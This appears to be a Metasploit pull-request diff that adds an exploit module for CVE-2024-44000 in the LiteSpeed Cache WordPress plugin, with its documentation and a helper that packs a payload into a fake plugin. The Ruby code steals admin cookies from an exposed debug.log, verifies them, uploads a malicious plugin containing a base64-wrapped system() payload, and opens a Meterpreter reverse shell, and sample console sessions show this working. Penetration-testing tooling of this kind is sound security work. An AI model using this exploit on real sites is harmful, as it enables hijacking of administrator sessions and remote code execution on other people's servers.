Land rapid7#19457, WP Plugin LiteSpeed Cache Account Take Over Module

Author: dledda-r7

documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md

@@ -0,0 +1,112 @@
+## Vulnerable Application
+This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently
+has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging
+feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible
+without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies
+found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
+
+### Setup
+Spin up a WordPress container with the following docker-compose file:
+```yml
+version: '3.8'
+
+services:
+  db:
+    image: mysql:latest
+    volumes:
+      - db_data:/var/lib/mysql
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_password
+      MYSQL_DATABASE: wordpress
+      MYSQL_USER: wordpress_user
+      MYSQL_PASSWORD: example_password
+
+  wordpress:
+    depends_on:
+      - db
+    image: wordpress:latest
+    ports:
+      - "8000:80"
+    restart: always
+    environment:
+      WORDPRESS_DB_HOST: db:3306
+      WORDPRESS_DB_USER: wordpress_user
+      WORDPRESS_DB_PASSWORD: example_password
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress_data:/var/www/html
+
+volumes:
+  db_data:
+  wordpress_data:
+```
+
+Download, install and activate the vulnerable LiteSpeed Cache plugin: https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip
+Once installed a LiteSpeed menu bar item should appear on the left hand side of the application. When clicked a drop down
+should appear. Select "ToolBox", then select "Debug Settings". Then switch the "Debug Log" feature to "On".
+
+Sign out of WordPress and when you reauthenticate your admin cookie will be logged to /wp-content/debug.log
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use multi/http/wp_litespeed_cookie_theft`
+1. Set the `RHOST`, `LHOST` and `RPORT`
+1. Run the module
+1. Receive a Meterpreter session in the context of the user running the WordPress site.
+
+## Scenarios
+### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+
+```
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
+
+[*] Started reverse TCP handler on 192.168.1.67:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] One or more potential admin cookies were found
+[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php...
+[*] Sending stage (39927 bytes) to 192.168.1.67
+[+] Deleted OiDynMUetY.php
+[+] Deleted qSNzhabMTP.php
+[+] Deleted ../qSNzhabMTP
+[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 29292f368fe3
+OS          : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+
+```
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
+
+[*] Started reverse TCP handler on 192.168.1.67:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] One or more potential admin cookies were found
+[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php...
+[*] Sending stage (3045380 bytes) to 192.168.1.67
+[+] Deleted WvXecICkgw.php
+[+] Deleted IVStOPtwuq.php
+[+] Deleted ../IVStOPtwuq
+[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.22.0.3
+OS           : Debian 12.5 (Linux 6.10.4-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

lib/msf/core/exploit/remote/http/wordpress/admin.rb

@@ -42,6 +42,30 @@ def wordpress_upload_plugin(name, zip, cookie)
     end
   end
 
+
+  # Generate a WordPress plugin containing a Metasploit payload.
+  #
+  # @param plugin_name [String] The name of the plugin
+  # @param payload_name [String] The .php file name
+  # @return [Rex::Zip::Archive] return a valid WordPress plugin in a zip file.
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %(<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Faker::App.semantic_version}
+ * Author: #{Faker::Name.name}
+ * Author URI: #{Faker::Internet.url}
+ * License: GPL2
+ */
+?>)
+
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
+    zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)
+    zip
+  end
+
   # Edits a plugin file (relative to plugins dir) using a valid admin session.
   #
   # @param file [String] The plugin file to edit (relative to plugins dir)

modules/exploits/multi/http/wp_litespeed_cookie_theft.rb

@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  class DebugLogError < StandardError; end
+  class WordPressNotOnline < StandardError; end
+  class AdminCookieError < StandardError; end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',
+        'Description' => %q{
+          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin
+          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when
+          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint
+          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.
+          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
+        },
+        'Author' => [
+          'Rafie Muhammad', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],
+          [ 'CVE', '2024-44000']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => ['unix', 'linux', 'win', 'php'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-09-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    @admin_cookie = get_valid_admin_cookie
+    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')
+  rescue WordPressNotOnline => e
+    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")
+  rescue DebugLogError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  rescue AdminCookieError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  end
+
+  def extract_cookies(debug_log)
+    admin_cookies = []
+    debug_log.each_line do |log_line|
+      # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c
+      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)
+      admin_cookies << match.captures.compact.join('; ') if match
+    end
+    admin_cookies
+  end
+
+  def verify_admin_cookie(admin_cookies)
+    admin_cookies.each do |admin_cookie|
+      res = send_request_cgi({
+        'uri' => '/wp-admin/',
+        'cookie' => admin_cookie
+      })
+      return admin_cookie if res&.code == 200
+    end
+
+    nil
+  end
+
+  def get_valid_admin_cookie
+    raise WordPressNotOnline unless wordpress_and_online?
+
+    res = send_request_cgi({
+      'uri' => normalize_uri('wp-content', 'debug.log'),
+      'method' => 'GET'
+    })
+    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200
+    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')
+
+    admin_cookies = extract_cookies(res.body)
+    raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?
+
+    print_status('One or more potential admin cookies were found')
+
+    admin_cookie = verify_admin_cookie(admin_cookies)
+    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie
+
+    admin_cookie
+  end
+
+  def exploit
+    unless @admin_cookie
+      begin
+        @admin_cookie = get_valid_admin_cookie
+        print_good('Found and tested valid admin cookie, we can upload and execute a payload')
+      rescue WordPressNotOnline => e
+        fail_with(Failure::NotFound, "#{e.class}, #{e}")
+      rescue DebugLogError, AdminCookieError => e
+        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")
+      end
+    end
+
+    print_status('Preparing payload...')
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = Rex::Text.rand_text_alpha(10).to_s
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status('Uploading payload...')
+
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })
+  end
+end